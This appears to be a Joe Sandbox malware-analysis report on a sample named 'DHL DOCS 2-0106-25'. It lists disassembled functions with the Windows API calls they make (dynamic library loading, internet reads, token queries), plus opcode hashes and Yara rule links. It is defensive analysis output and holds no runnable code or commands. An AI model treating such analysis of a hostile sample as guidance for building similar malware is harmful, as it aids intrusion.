Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: accd32d5603fd000b861936f19152746e90aed49f1826266dcf96d94a6374f48
Instruction ID: 28aa18d3cd409f9fb8542e15e456d3e82786bef9c9e04d638d67f990195e9d98
Opcode Fuzzy Hash: accd32d5603fd000b861936f19152746e90aed49f1826266dcf96d94a6374f48
Instruction Fuzzy Hash: D3518AB5A10619EFCB14CF68D884AAAB7F8FF99310B118569F905DB350E730E911CF90

Function 00228AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00228BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00228BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00228C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00228C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00228C5F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 08a511a6240cd54fc4f357a1ae09c86facc35739c3b9c76180630aa499a32298
Instruction ID: 60efa0e5530be04df03619a7dcb9f099fa1ce4e6626c16b3865edeea55b19326
Opcode Fuzzy Hash: 08a511a6240cd54fc4f357a1ae09c86facc35739c3b9c76180630aa499a32298
Instruction Fuzzy Hash: DA516C35A00215AFCB15DF65D881EADBBF5FF59314F088059E849AB3A2CB31ED51CBA0

Function 00238EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00238F40
GetProcAddress.KERNEL32(00000000,?), ref: 00238FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00238FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00239032
FreeLibrary.KERNEL32(00000000), ref: 00239052

Part of subcall function 001CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00221043,?,753CE610), ref: 001CF6E6
Part of subcall function 001CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0020FA64,00000000,00000000,?,?,00221043,?,753CE610,?,0020FA64), ref: 001CF70D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: fe3571365a71e5d6b5cb72362a0719141c1b6b13bc16a1f2f5ce1e7f9a56df21
Instruction ID: 6dcf4cf17a6af691b376cd857b4262b21bbfa891a80e45b9ac334a3bc24fd098
Opcode Fuzzy Hash: fe3571365a71e5d6b5cb72362a0719141c1b6b13bc16a1f2f5ce1e7f9a56df21
Instruction Fuzzy Hash: 08514874605205DFCB14DF68C4848ADBBB1FF59314F1480A8E80A9B762DB71ED86CB90

Function 001E2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001E20C3
_free.LIBCMT ref: 001E20E3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9ae3fa5d31c192fc5a5486828d44fe36f6784c8171da842b80f2370f316949af
Instruction ID: 1398f736ee460d196fde8d5a16a67ad3d9511ebfb412636026f713ba9fe2974f
Opcode Fuzzy Hash: 9ae3fa5d31c192fc5a5486828d44fe36f6784c8171da842b80f2370f316949af
Instruction Fuzzy Hash: 0B41E232A006009FCB24DF79C891A9DB3E9EF99314F26456DE515EB392D731EE01CB80

Function 00223874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002238CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00223922
TranslateMessage.USER32(?), ref: 0022394B
DispatchMessageW.USER32(?), ref: 00223955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00223966

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4c5f0a0f9e2d6d7f6e075e94d5a2001b432ee89899adbea705ab8809a8571089
Instruction ID: b640538b95479d0cd4dafa945cb79b27e8ca1de7937e175c5f43caca1857be78
Opcode Fuzzy Hash: 4c5f0a0f9e2d6d7f6e075e94d5a2001b432ee89899adbea705ab8809a8571089
Instruction Fuzzy Hash: 4131B574925362FEEB25CFB4B84DBB637A8AB06300F140569E452961E0E3FC96E5CB11

Function 0022CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0022C21E,00000000), ref: 0022CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0022CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0022C21E,00000000), ref: 0022CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0022C21E,00000000), ref: 0022CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0022C21E,00000000), ref: 0022CFF2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: e1df228a7cc5ecc6886fb8c3cd3b39ee98dc39e0b9f030850253472020627ab2
Instruction ID: 4c7ddc64ac2ef28e9cd67fd59923f20faf046258c7addf168ca538d40a42d2e9
Opcode Fuzzy Hash: e1df228a7cc5ecc6886fb8c3cd3b39ee98dc39e0b9f030850253472020627ab2
Instruction Fuzzy Hash: 95318B71510216FFDB20DFE9E984AAEBBF9EB14350B20402EF506D2550DB70EE519B60

Function 00211901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00211915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002119C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002119C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002119DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002119E2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: fc31c6fac8d6b6479b1791bd637f66cef6c11f80f520c23fc3ef62ce6d4b5f3f
Instruction ID: 0f0baf0fc577348baf8124a22b25f203852d8a95d44c40a14f06082e2a3631f0
Opcode Fuzzy Hash: fc31c6fac8d6b6479b1791bd637f66cef6c11f80f520c23fc3ef62ce6d4b5f3f
Instruction Fuzzy Hash: BB31E27191021AEFCB04CFACDD9DADE3BB5EB55314F108225FA25A72D0C37099A4CB90

Function 00245706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00245745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0024579D
_wcslen.LIBCMT ref: 002457AF
_wcslen.LIBCMT ref: 002457BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00245816

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 5d88ae40eab6f800645eaf0b2e1127ea0927f03f85c6e663ea3629b0eb1e4459
Instruction ID: 445eb5753e8f4233906373572e1617a56e3be470f31ea7f5fac2e15771077f16
Opcode Fuzzy Hash: 5d88ae40eab6f800645eaf0b2e1127ea0927f03f85c6e663ea3629b0eb1e4459
Instruction Fuzzy Hash: E721D5749246289BDB248F64CC85AEDB7BCFF05324F108216F969EA1C1D7708995CF50

Function 00230930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00230951
GetForegroundWindow.USER32 ref: 00230968
GetDC.USER32(00000000), ref: 002309A4
GetPixel.GDI32(00000000,?,00000003), ref: 002309B0
ReleaseDC.USER32(00000000,00000003), ref: 002309E8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 9a27e9143e19d6c0d28734003911400eba7e692c5ed74c32778801a011a1a826
Instruction ID: 2d47ddb32deea60f46b26b4bcd5508c6cf43aca1a71f4c3fe69d509fdd6a062d
Opcode Fuzzy Hash: 9a27e9143e19d6c0d28734003911400eba7e692c5ed74c32778801a011a1a826
Instruction Fuzzy Hash: 9A21A479600214AFD714EFA8E888AAEB7F9EF45700F158068F84A97762CB70AD04CB50

Function 001ECDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001ECDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001ECDE9

Part of subcall function 001E3820: RtlAllocateHeap.NTDLL(00000000,?,00281444,?,001CFDF5,?,?,001BA976,00000010,00281440,001B13FC,?,001B13C6,?,001B1129), ref: 001E3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001ECE0F
_free.LIBCMT ref: 001ECE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001ECE31

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 99ab800f0947addf9becf83ae1c668f97d1be533b4fb159ab7fe5b746728026c
Instruction ID: 0e532a76624708e26e67a26bd105dbb1c91e49b34bd2374f9b45c4535822bd0d
Opcode Fuzzy Hash: 99ab800f0947addf9becf83ae1c668f97d1be533b4fb159ab7fe5b746728026c
Instruction Fuzzy Hash: 2D018476602A957F23251ABB7C8DD7F6D6DEEC7FA13250129F909D7201EB618D0281F0

Function 001C9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001C9693
SelectObject.GDI32(?,00000000), ref: 001C96A2
BeginPath.GDI32(?), ref: 001C96B9
SelectObject.GDI32(?,00000000), ref: 001C96E2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c8dd110abf90501ac821e970ae0ada29e0d30c5c8b1d980516654f32168c32fc
Instruction ID: 8daa4436f9598f4b58d808128f1e387266f0b38a6a05d266d7b59d8b9c00e34a
Opcode Fuzzy Hash: c8dd110abf90501ac821e970ae0ada29e0d30c5c8b1d980516654f32168c32fc
Instruction Fuzzy Hash: 26218E38803355EBDB119F68FC0CBA93BA8BB21325F20061AF414A61F1D37098A2CF94

Function 00215711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00215726
_memcmp.LIBVCRUNTIME ref: 00215744
_memcmp.LIBVCRUNTIME ref: 00215757
_memcmp.LIBVCRUNTIME ref: 0021576F
_memcmp.LIBVCRUNTIME ref: 00215787

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 071917a880a310869dfce56137d8662d70fa1b4731ffe71ab0d587a3b7a3ba78
Instruction ID: c4c59fe808cfe758d9b634dd227e719fa32c7bafac43d136f0ea561b4337e740
Opcode Fuzzy Hash: 071917a880a310869dfce56137d8662d70fa1b4731ffe71ab0d587a3b7a3ba78
Instruction Fuzzy Hash: 9C0196656A1615FAD24899109E83FFBB3DDABB63A4B004062FD049A281F760ED7186A0

Function 001E2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001DF2DE,001E3863,00281444,?,001CFDF5,?,?,001BA976,00000010,00281440,001B13FC,?,001B13C6), ref: 001E2DFD
_free.LIBCMT ref: 001E2E32
_free.LIBCMT ref: 001E2E59
SetLastError.KERNEL32(00000000,001B1129), ref: 001E2E66
SetLastError.KERNEL32(00000000,001B1129), ref: 001E2E6F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b508067df1919a734c867532535f4a7af1b0afd1527749bf231182e698439c62
Instruction ID: 650fc22bf56aa1f4bd8df5e5eda42148907c1e0f01bf8f749b778eb2fcc2b1ac
Opcode Fuzzy Hash: b508067df1919a734c867532535f4a7af1b0afd1527749bf231182e698439c62
Instruction Fuzzy Hash: A5012836206EA067C626677B7C5ED2F2A5DABE27B5B324038F425A32D3EF748C014120

Function 0021000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?,?,0021035E), ref: 0021002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?), ref: 00210046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?), ref: 00210054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?), ref: 00210064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?), ref: 00210070

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 51e69050b75a95bbde679337ed56578efcf3b17a4bc15b743423302df46d9204
Instruction ID: 4e18cd1c2a4099d6d95a7e18212b92ec380a4250c2ab430665e0b7ef69813d9a
Opcode Fuzzy Hash: 51e69050b75a95bbde679337ed56578efcf3b17a4bc15b743423302df46d9204
Instruction Fuzzy Hash: 3B01F27A611214BFDB114F68EC88BEA7AEDEF58791F204024F801D2210E7B1DED08BA0

Function 0021E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0021E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0021E9A5
Sleep.KERNEL32(00000000), ref: 0021E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0021E9B7
Sleep.KERNEL32 ref: 0021E9F3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: ca4ec96d4a712a808a97832d7fae786d740e46794cd046fa56291d81c3c7f896
Instruction ID: 2ebaecd07f716fab53f0e78d4bf60600a72ef6aa35895f6ba68015c5ac31151d
Opcode Fuzzy Hash: ca4ec96d4a712a808a97832d7fae786d740e46794cd046fa56291d81c3c7f896
Instruction Fuzzy Hash: 9D015B35C1252DDBCF409FE8EC4DAEDBBB8BB19700F110556E906B2140DB7095A087A2

Function 002110F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00211114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 00211120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 0021112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 00211136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0021114D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: c8ba3ba9a336d8f648c280b60d83aeac8451e144cdbe96e1dd2a1c6b77df5c2d
Instruction ID: 8afbd939a2b9012f8f065d2ff5f5249b651c220fe20737bbf4ee8d6b17368ed9
Opcode Fuzzy Hash: c8ba3ba9a336d8f648c280b60d83aeac8451e144cdbe96e1dd2a1c6b77df5c2d
Instruction Fuzzy Hash: 4D018179101605BFDB514FA9EC4DEAA7FAEEF86364B200424FA49C3360DB31DC508E60

Function 00210FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00210FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00210FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00210FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00210FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00211002

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 81c2f7794f4fab072f17835341495b0ce7994a39f4ec8d8f2eed940401713951
Instruction ID: 2852ec81b4c5426b3a5b76f610cf0bd321cb4e936eb43d9a804080a8b7855944
Opcode Fuzzy Hash: 81c2f7794f4fab072f17835341495b0ce7994a39f4ec8d8f2eed940401713951
Instruction Fuzzy Hash: ECF06239602311EBD7215FA8EC4DF963FADEF8A761F204414FE49C7251CA70DC908A60

Function 00211014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0021102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00211036
